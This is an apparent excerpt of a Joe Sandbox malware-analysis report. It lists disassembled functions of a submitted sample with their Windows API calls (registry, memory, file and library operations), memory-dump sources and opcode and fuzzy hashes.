                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID: System\CurrentControlSet\Control\Windows
                                                                            • API String ID: 71445658-1109719901
                                                                            • Opcode ID: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                            • Instruction ID: fabb803f5ff523eeab3b7a035bb747b9213277980d9d81731b2bf545c5070290
                                                                            • Opcode Fuzzy Hash: cac79e148e5d1637301d0cd401e0a8768c8b40d51dfb76d9d00be79e5a4099f3
                                                                            • Instruction Fuzzy Hash: EDD0C772910128BBDB10DA89DC41DF7775DDB59760F54401AFD0497141C1B4EC5197F4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DA38 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DA74
                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DB70), ref: 0042DAE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue
                                                                            • String ID:
                                                                            • API String ID: 3660427363-0
                                                                            • Opcode ID: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                            • Instruction ID: de7305fe23da407263f6a21fe748e6d6d926aae016943a7179aec9e2dd5a457b
                                                                            • Opcode Fuzzy Hash: fe899f6043c7f770a4508ac600d0d0e70af19fa3b1a52c17f713553a047210da
                                                                            • Instruction Fuzzy Hash: 4F417171E04129AFDF10DF91D891BAFBBB8EB01704F918466E810B7240D778BE04CB99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042DCF8 Relevance: 3.1, APIs: 2, Instructions: 104registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DD8C
                                                                            • RegCloseKey.ADVAPI32(?,0042DDFD,?,00000000,00000000,00000000,00000000,00000000,0042DDF6,?,?,00000008,00000000,00000000,0042DE23), ref: 0042DDF0
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnumOpen
                                                                            • String ID:
                                                                            • API String ID: 1332880857-0
                                                                            • Opcode ID: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                            • Instruction ID: 8750a336c872ea863c0e9609c16c650b162605484654b044cfb671e23e380797
                                                                            • Opcode Fuzzy Hash: ea84ca3d7e1f6c1c0b6d56cbe1a01e231d4ee03520b80429029a0b90aff89d77
                                                                            • Instruction Fuzzy Hash: D031B370F046496FDB14DFA6DC42BAFBBB9EB48304F90407BE400F7281D6785A01CA29
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045BB04 Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045BB38
                                                                            • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045BB7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocDecompressInitVirtualZ2_bz
                                                                            • String ID:
                                                                            • API String ID: 3582128297-0
                                                                            • Opcode ID: 04ee8a09a77f9cb4ad0e35216109e6650bf3758c7b2c6ee42b92bcd29b0de351
                                                                            • Instruction ID: de1f4db79621eba26a1551bd8f4b45d690b525063c3d7b9017636b10e8a694c6
                                                                            • Opcode Fuzzy Hash: 04ee8a09a77f9cb4ad0e35216109e6650bf3758c7b2c6ee42b92bcd29b0de351
                                                                            • Instruction Fuzzy Hash: 7511C871600605BBD314DF368D41B96F7A5FF84711F044227E908D7681D7B9B968CBD8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040AF38 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AF52
                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B0AF,00000000,0040B0C7,?,?,?,00000000), ref: 0040AF63
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindFree
                                                                            • String ID:
                                                                            • API String ID: 4097029671-0
                                                                            • Opcode ID: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                            • Instruction ID: b3b639975b52532719f451a44c4ce50818db8a334c2074d500fa8c69fc4aeb59
                                                                            • Opcode Fuzzy Hash: 4a3d0bcc4be787f81902a26f6412a4ca12b3141026bcd8183d147badd2f1fda4
                                                                            • Instruction Fuzzy Hash: 4E01F2B1704300AFE710EF69DC92E1A77EDDB897187118076FA00EB3D0DA79AC11966A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041EE14 Relevance: 3.0, APIs: 2, Instructions: 49threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                            • 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: A15940CurrentThread
                                                                            • String ID:
                                                                            • API String ID: 1959240892-0
                                                                            • Opcode ID: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                            • Instruction ID: 841e8cf9215cf9d4f8ef4a1d843f5d233028b5bef1f8e83ef409b09beadc9532
                                                                            • Opcode Fuzzy Hash: 45cd012e44c1ea1951e100f055d23ec2744ac20cc53ecf2ddac386a9fa93ee21
                                                                            • Instruction Fuzzy Hash: 6F015B78A04704BFD701CF66EC11956BBE8E78E720B22887BE804D36A0E6385A10DE18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00451604 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00451646
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0045166C), ref: 0045164E
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLastMove
                                                                            • String ID:
                                                                            • API String ID: 55378915-0
                                                                            • Opcode ID: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                            • Instruction ID: 57412c2de2bde2b2a9805fafeac613dae152aa12b64c6f91c1867b3f37f776c5
                                                                            • Opcode Fuzzy Hash: c0091c7478651bb023fdc3e57b8347735b5c978529b19831f608ec334460ef2a
                                                                            • Instruction Fuzzy Hash: BF01FE71B046446BCB10DF795C4159EB7ECDB48715750457BFC04E3752D6784E04855C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040170C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001314,00005317,00401973), ref: 00401766
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID: ,#v
                                                                            • API String ID: 1263568516-3386492414
                                                                            • Opcode ID: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                            • Instruction ID: d642a266e39ce0e7ed3a16981b1f18689788e3c7e0ce9d7f944c9fabc33182c4
                                                                            • Opcode Fuzzy Hash: 73967e57ec88561925e751cf3b04359846007a52136d561720e1a1017b553e6f
                                                                            • Instruction Fuzzy Hash: E90120766443148FC3109F29DCC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004510F4 Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451153), ref: 0045112D
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00451153), ref: 00451135
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            • Opcode ID: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                            • Instruction ID: 2e99f9ab552fbc56df806c3ed4a11eaf09234a16047ee46c2fb58af4c34436b5
                                                                            • Opcode Fuzzy Hash: 9df6799d2deb5604f29dc944684a2a8f5f943dbd13ec3aef100c12e22da0ad7e
                                                                            • Instruction Fuzzy Hash: F1F02871A44604ABCB00DFB5AC42A9EB7E8DB0D715B1145F7FD04E3792E6394E048598
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045128C Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DeleteFileA.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512C3
                                                                            • GetLastError.KERNEL32(00000000,00000000,004512E9,?,-00000001,?), ref: 004512CB
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: DeleteErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2018770650-0
                                                                            • Opcode ID: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                            • Instruction ID: bd8feaa310c53350912bac505fe5cd46c6aff24ad7297d0b96d1d9052aedfe22
                                                                            • Opcode Fuzzy Hash: f8db7b56bf8a9a54d59ee2d7b5184a4b5376af573ae6214083b0e3b1e2c70d75
                                                                            • Instruction Fuzzy Hash: 12F0C871E04608ABCF00DFB59C4259EB7ECDB48715B5085F7FC04E3652E6385E14859C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00451464 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 0045149D
                                                                            • GetLastError.KERNEL32(00000000,00000000,004514C3,?,?,00000000), ref: 004514A5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 1799206407-0
                                                                            • Opcode ID: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                            • Instruction ID: d7471e736b24b3bb5787cc7ba159720b7e0b567afb63d73ad787c716b5a8a183
                                                                            • Opcode Fuzzy Hash: e17b5db4e343fd94e30e534fa130a123d661becf893d2ac77d3be9b7813e3ada
                                                                            • Instruction Fuzzy Hash: 80F0C871A04748ABCB10DFA59C4199EB3E8DB4A72676047B7FC14E3692E6385E048598
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045BBF8 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045BAF6), ref: 0045BC4A
                                                                            Strings
                                                                            • bzlib: Too much memory requested, xrefs: 0045BC25
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID: bzlib: Too much memory requested
                                                                            • API String ID: 4275171209-1500031545
                                                                            • Opcode ID: 2ddd8d33209de59b424c30150e79cceb60549a8de6be50806ac80a379e705931
                                                                            • Instruction ID: ed49dcd2765f2e5423e21fcf989307f579cbf2677da8cf1a3fded4ceb693e5a7
                                                                            • Opcode Fuzzy Hash: 2ddd8d33209de59b424c30150e79cceb60549a8de6be50806ac80a379e705931
                                                                            • Instruction Fuzzy Hash: F0F0307270051407D752D9AD88817DA6294CB4835AF18457ABF4CDF28BDAADDD8483AC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004231AC Relevance: 3.0, APIs: 2, Instructions: 35COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004231B9
                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 004231E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorLoad
                                                                            • String ID:
                                                                            • API String ID: 3238433803-0
                                                                            • Opcode ID: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                            • Instruction ID: 4f47f79916221551be92d6970dee20b840cac536ee7260014ee3ac6489712308
                                                                            • Opcode Fuzzy Hash: aae096a89314637c6453d25c5342f24cc030d518ad25ac5b3f1f31990d67ac6e
                                                                            • Instruction Fuzzy Hash: C9F0A7117001145BD6205D3E6CC1D3A72688F87736B61033BFE2AD72D1C62E2D51426D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0042E1F0 Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E1FA
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E244,?,00000000,0042E262,?,00008000), ref: 0042E229
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLibraryLoadMode
                                                                            • String ID:
                                                                            • API String ID: 2987862817-0
                                                                            • Opcode ID: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                            • Instruction ID: 2bd629673230950b16c4bb4544665cc4d3578012b9e0763c9fae70ecea85f9d4
                                                                            • Opcode Fuzzy Hash: 47d034d6c104ad3889763985cd5d076ad7b368865af99a999868f5179706add0
                                                                            • Instruction Fuzzy Hash: 31F08270714744FEDF019F779C6282BBBECE74DB1479249B6F800A2691E63C5810C939
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044FDD0 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDE6
                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046BB71,?,00000000), ref: 0044FDEE
                                                                              • Part of subcall function 0044FB8C: GetLastError.KERNEL32(0044F9A8,0044FC4E,?,00000000,?,00491CE4,00000001,00000000,00000002,00000000,00491E45,?,?,00000005,00000000,00491E79), ref: 0044FB8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$FilePointer
                                                                            • String ID:
                                                                            • API String ID: 1156039329-0
                                                                            • Opcode ID: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                            • Instruction ID: 60b10378e44b0f0defca91e9e4490efccb0b8310a6ae63c26c4d70013a2aa3fa
                                                                            • Opcode Fuzzy Hash: 6fde208f1bbd2e8b1a27b48321887b78cc6f72325f42f484ac007055b8b6af44
                                                                            • Instruction Fuzzy Hash: FEE012F53056016BFB10EA7599C1F3B22D8DB48314F10447AB545CF186D674DC098B35
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Alloc
                                                                            • String ID:
                                                                            • API String ID: 2558781224-0
                                                                            • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                            • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                            • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                            • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00478A5C Relevance: 1.6, APIs: 1, Instructions: 128windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SendNotifyMessageA.USER32(00020446,00000496,00002711,00000000), ref: 00478C14
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageNotifySend
                                                                            • String ID:
                                                                            • API String ID: 3556456075-0
                                                                            • Opcode ID: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                            • Instruction ID: e9f93c3131ab9aed4d7988b9751f139f8c14b39f52ecba7056dfc34498fb85c2
                                                                            • Opcode Fuzzy Hash: dd11d05620da802d8bb77eb810d1a1e8a62731b247d417d0c288434990103d14
                                                                            • Instruction Fuzzy Hash: 0441A6746010008BC701FF66EC85A8B7BA5AB94309B65C57BB4049F3A7CA3CED478B5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041FB0C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FBA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoScroll
                                                                            • String ID:
                                                                            • API String ID: 629608716-0
                                                                            • Opcode ID: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                            • Instruction ID: 884c2cb002146e47c45dd1875db58eae66db6a4caaf859e9ca4b80fd75174b4c
                                                                            • Opcode Fuzzy Hash: 50e1310ba0544b59a0555e2be0f3aefd4cf1699031129a7841ddf0d9dd467a2f
                                                                            • Instruction Fuzzy Hash: DD2130716087456FC340DF39D840696BBE4BB48344F148A3EA098C3341D774E99ACBD6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00467FB0 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0041EE14: GetCurrentThreadId.KERNEL32 ref: 0041EE63
                                                                              • Part of subcall function 0041EE14: 73A15940.USER32(00000000,0041EDC4,00000000,00000000,0041EE80,?,00000000,0041EEB7,?,0042E804,?,00000001), ref: 0041EE69
                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046800E,?,00000000,?,?,0046821B,?,00000000,0046825A), ref: 00467FF2
                                                                              • Part of subcall function 0041EEC8: IsWindow.USER32(?), ref: 0041EED6
                                                                              • Part of subcall function 0041EEC8: EnableWindow.USER32(?,00000001), ref: 0041EEE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
